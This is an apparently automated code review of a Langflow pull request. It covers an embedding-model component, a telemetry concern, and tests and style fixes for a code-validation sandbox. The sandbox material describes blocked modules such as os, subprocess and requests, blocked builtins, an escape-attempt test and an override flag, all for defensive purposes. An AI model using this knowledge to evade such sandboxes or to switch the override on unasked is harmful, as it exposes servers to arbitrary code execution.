[])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == \"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. 
\"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = 
self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n" | |
| }, | |
| "value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. 
\"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == \"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. 
\"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = 
self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = field_value or self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n" |
🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2018-2019, the ollama_base_url handler ignores the incoming
field_value and always uses self.ollama_base_url, which can cause stale model
lists; change the handler to use a local variable (e.g., ollama_url =
field_value or self.ollama_base_url) and then pass that variable to
is_valid_ollama_url and get_ollama_models so updates use the new value when
provided while still falling back to the instance attribute if field_value is
empty.
| "input_text": { | ||
| "_input_type": "BoolInput", | ||
| "advanced": true, | ||
| "display_name": "Include the original text in the output", | ||
| "dynamic": false, | ||
| "info": "", | ||
| "list": false, | ||
| "list_add_label": "Add More", | ||
| "name": "input_text", | ||
| "placeholder": "", | ||
| "required": false, | ||
| "show": false, | ||
| "title_case": false, | ||
| "tool_mode": false, | ||
| "trace_as_metadata": true, | ||
| "track_in_telemetry": true, | ||
| "type": "bool", | ||
| "value": true | ||
| }, |
Telemetry/privacy check for input_text flag.
The field is tracked in telemetry (`track_in_telemetry: true`). Ensure only the boolean value is captured (no raw text) and that analytics pipelines don’t infer content from it. If that can’t be guaranteed, disable tracking for this field.
🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2038 to 2056, the input_text field is currently configured to be
traced and tracked which risks leaking raw text; change configuration so only
the boolean value is recorded — set trace_as_metadata to false and
track_in_telemetry to false (or remove those flags) and verify no other
properties (placeholders, default value, or surrounding logic) send or derive
the original text to analytics; if you cannot guarantee analytics will only
receive a boolean, disable telemetry entirely for this field.
| response = await client.post( | ||
| "api/v1/validate/code", json={"code": code_trying_to_escape}, headers=logged_in_headers | ||
| ) | ||
| result = response.json() | ||
| assert response.status_code == status.HTTP_200_OK | ||
| # Code executes but in isolation - sys is imported fresh, not server's sys | ||
|
|
||
|
|
||
| @pytest.mark.usefixtures("active_user") | ||
| async def test_validate_code_allows_safe_code(client: AsyncClient, logged_in_headers): | ||
| """Test that legitimate safe code still works.""" | ||
| safe_code = """ | ||
| from typing import List, Optional | ||
| def process(items: List[str]) -> Optional[str]: | ||
| return items[0] if items else None | ||
| """ | ||
| response = await client.post("api/v1/validate/code", json={"code": safe_code}, headers=logged_in_headers) | ||
| result = response.json() | ||
| assert response.status_code == status.HTTP_200_OK | ||
| # Should have no errors for safe code | ||
| assert len(result["imports"]["errors"]) == 0 | ||
| assert len(result["function"]["errors"]) == 0 | ||
|
|
||
|
|
||
| # Isolation verification tests | ||
| # | ||
| # IMPORTANT: These tests verify that the validate endpoint uses the sandbox. | ||
| # The actual isolation behavior is tested in src/lfx/tests/unit/custom/test_sandbox_isolation.py | ||
| # These tests just verify that dangerous code executes without crashing (proves sandbox is used) | ||
| @pytest.mark.usefixtures("active_user") | ||
| async def test_validate_code_allows_safe_imports(client: AsyncClient, logged_in_headers): | ||
| """Test that safe imports are allowed.""" | ||
| # Code with safe imports should work | ||
| safe_code = """ | ||
| from typing import List, Optional | ||
| import json | ||
| import math | ||
| def test(items: List[str]) -> Optional[str]: | ||
| return json.dumps({"count": math.sqrt(len(items))}) | ||
| """ | ||
| response = await client.post("api/v1/validate/code", json={"code": safe_code}, headers=logged_in_headers) | ||
| result = response.json() | ||
| assert response.status_code == status.HTTP_200_OK | ||
| # Should execute without errors - safe imports are allowed | ||
| assert len(result["imports"]["errors"]) == 0 | ||
| assert len(result["function"]["errors"]) == 0 | ||
|
|
||
|
|
||
| @pytest.mark.usefixtures("active_user") | ||
| async def test_validate_code_allows_third_party_libraries(client: AsyncClient, logged_in_headers): | ||
| """Test that third-party libraries (not in a whitelist) can be imported. | ||
| Users should be able to import legitimate third-party libraries like AI libraries, | ||
| data processing libraries, etc. We only block dangerous system-level modules. | ||
| """ | ||
| # Try importing a common third-party library that wouldn't be in a whitelist | ||
| # Using 'requests' as an example - it's a legitimate library but not dangerous | ||
| # Note: This test will fail if 'requests' isn't installed, but that's okay | ||
| # The important thing is that if it IS installed, it should be allowed | ||
| third_party_code = """ | ||
| try: | ||
| import requests | ||
| HAS_REQUESTS = True | ||
| except ImportError: | ||
| HAS_REQUESTS = False | ||
| def test(): | ||
| return HAS_REQUESTS | ||
| """ | ||
| response = await client.post("api/v1/validate/code", json={"code": third_party_code}, headers=logged_in_headers) | ||
| result = response.json() | ||
| assert response.status_code == status.HTTP_200_OK | ||
| # Should execute without errors - third-party libraries are allowed | ||
| # (unless they're in BLOCKED_MODULES like 'os', 'subprocess', etc.) | ||
| assert len(result["imports"]["errors"]) == 0 | ||
| assert len(result["function"]["errors"]) == 0 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
🧩 Analysis chain
Fix unused result and align third‑party import expectations with sandbox blocklist
- In `test_validate_code_cannot_access_server_globals` (Line 139), `result = response.json()` is never used, which triggers Ruff F841. Either drop the assignment or assert on the returned payload (for example, that "sys" or "blocked" appears in the combined `imports`/`function` errors to confirm the sandbox blocked the module).
- In `test_validate_code_allows_third_party_libraries`, the test asserts that importing `requests` never produces errors, but the sandbox’s `BLOCKED_MODULES` currently includes `"requests"` and `"httpx"` as dangerous network modules. With that configuration, `create_isolated_import("requests", ...)` will raise a `SecurityViolation`, and `validate_code` will populate `imports["errors"]`, causing this test to fail.
You’ll want to either:
- Treat network libraries as allowed during validation (remove `requests`/`httpx` from `BLOCKED_MODULES`), or
- Relax this test to something like "if `requests` is installed and not blocklisted, the import should succeed", or gate it with `pytest.importorskip("requests")` and adjust expectations based on the sandbox policy.
Right now, the test’s assertion that “third‑party libraries are allowed” conflicts with the current sandbox blocklist.
🏁 Script executed:
#!/bin/bash
# Confirm BLOCKED_MODULES contents and observe validate-code behavior for `requests`.
python - << 'PY'
from lfx.custom.sandbox import BLOCKED_MODULES
print("BLOCKED_MODULES:", sorted(BLOCKED_MODULES))
from lfx.custom.validate import validate_code
code = "import requests\n"
print("validate_code result:", validate_code(code))
PY

Length of output: 115
The web search results provide general information about Python sandbox patterns, but not the specific codebase. Let me inspect the actual source files directly using shell commands.
---
🏁 Script executed:
#!/bin/bash
# Find and inspect the sandbox and validate modules
find . -type f -name "*.py" | grep -E "(sandbox|validate)" | head -20
Length of output: 610
🏁 Script executed:
#!/bin/bash
# Search for BLOCKED_MODULES and validate_code in the repo
fd -e py -x rg -l "BLOCKED_MODULES|validate_code" {} \; | head -20

Length of output: 484
---
🏁 Script executed:
#!/bin/bash
# Read BLOCKED_MODULES from sandbox.py
cat ./src/lfx/src/lfx/custom/sandbox.py | head -100
Length of output: 2782
🏁 Script executed:
#!/bin/bash
# Read validate_code function from lfx validate.py
cat ./src/lfx/src/lfx/custom/validate.py

Length of output: 18706
🏁 Script executed:
#!/bin/bash
# Read the test file around line 139 and the full test functions in question
sed -n '136,220p' ./src/backend/tests/unit/api/v1/test_validate.py

Length of output: 3605
---
🏁 Script executed:
#!/bin/bash
# Read create_isolated_import function from sandbox.py
cat ./src/lfx/src/lfx/custom/sandbox.py | grep -A 30 "def create_isolated_import"
Length of output: 1546
🏁 Script executed:
#!/bin/bash
# Search for any runtime modification of BLOCKED_MODULES
rg -n "BLOCKED_MODULES\s*=" ./src/lfx/src/lfx/custom/sandbox.py
rg -n "BLOCKED_MODULES\." ./src/lfx/src/lfx/custom/ -A 2 -B 2Length of output: 0
🏁 Script executed:
#!/bin/bash
# Check if there are any fixture or setup functions that modify sandbox behavior in tests
sed -n '1,150p' ./src/backend/tests/unit/api/v1/test_validate.py | head -80

Length of output: 2882
Fix unused result variable and address test failure due to blocked requests module
Two issues confirmed:
- Line 139 — Unused variable (Ruff F841): `result = response.json()` is assigned but never used. Either remove the assignment or assert on it (e.g., to confirm the sandbox blocked the module).
- `test_validate_code_allows_third_party_libraries` (lines 199–213) — Test will fail: the test imports `requests` and expects `len(result["imports"]["errors"]) == 0`, but `requests` is explicitly in `BLOCKED_MODULES` as a dangerous network module. When `isolated_import` tries to load `requests`, it raises `SecurityViolation`, which `validate_code` catches and appends to the errors list. The assertion will fail.
Choose one approach:
- Remove `requests` and `httpx` from `BLOCKED_MODULES` if network access should be allowed during validation, or
- Rewrite the test to skip the assertion if the module is blocked, or gate it with `pytest.importorskip("requests")` and adjust expectations based on your sandbox policy (a sketch of this second option follows below).
🧰 Tools
🪛 GitHub Actions: Ruff Style Check
[error] 139-139: F841 Local variable result is assigned to but never used.
🪛 GitHub Check: Ruff Style Check (3.13)
[failure] 139-139: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:139:5: F841 Local variable result is assigned to but never used
🤖 Prompt for AI Agents
In src/backend/tests/unit/api/v1/test_validate.py around lines 136–213, fix two
issues: at ~line 139 remove the unused assignment `result = response.json()` (or
replace it with an assertion using `result` if you intended to validate response
content); and for the third-party import test (lines ~199–213) change the test
to handle the sandbox policy: use pytest.importorskip("requests") to skip the
test when requests is not available, or update the assertions to accept both
outcomes (if the sandbox blocks network modules then expect an imports error,
otherwise expect zero import errors) so the test reflects whether `requests` is
allowed by BLOCKED_MODULES.
| class SecurityViolation(Exception): | ||
| """Raised when code attempts to escape the sandbox or use blocked operations.""" |
Address Ruff violations: exception naming, long messages, and simple try/except
Ruff is flagging several style issues here:
- Line 17: `SecurityViolation` violates N818 (exception names should end with `Error`). Either rename the class (e.g., `SecurityViolationError`) or add a local suppression like `class SecurityViolation(Exception):  # noqa: N818` if you prefer the current name.
- Lines 105–108: The `try/except AttributeError: pass` around `getattr(builtins, name)` can be simplified using `contextlib.suppress(AttributeError)`:
-import builtins
+import builtins
+import contextlib
@@
- for name in dir(builtins):
- if not name.startswith("_"):
- # Block dangerous builtins unless explicitly allowed
- if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
- continue
- try:
- isolated_builtins[name] = getattr(builtins, name)
- except AttributeError:
- pass
+ for name in dir(builtins):
+ if not name.startswith("_"):
+ if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
+ continue
+ with contextlib.suppress(AttributeError):
+ isolated_builtins[name] = getattr(builtins, name)

- Lines ~128–130 and ~160–162: Raising `SecurityViolation` with long f-strings trips EM102/TRY003/E501. Factor the message into a variable and pass it to the exception:
- if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
- raise SecurityViolation(
- f"Dangerous builtin '{name}' is blocked. "
- f"Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."
- )
+ if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS:
+ msg = (
+ f"Dangerous builtin '{name}' is blocked. "
+ "Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."
+ )
+ raise SecurityViolation(msg)
@@
- if module_name in BLOCKED_MODULES:
- raise SecurityViolation(
- f"Dangerous module '{module_name}' is blocked. "
- f"Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."
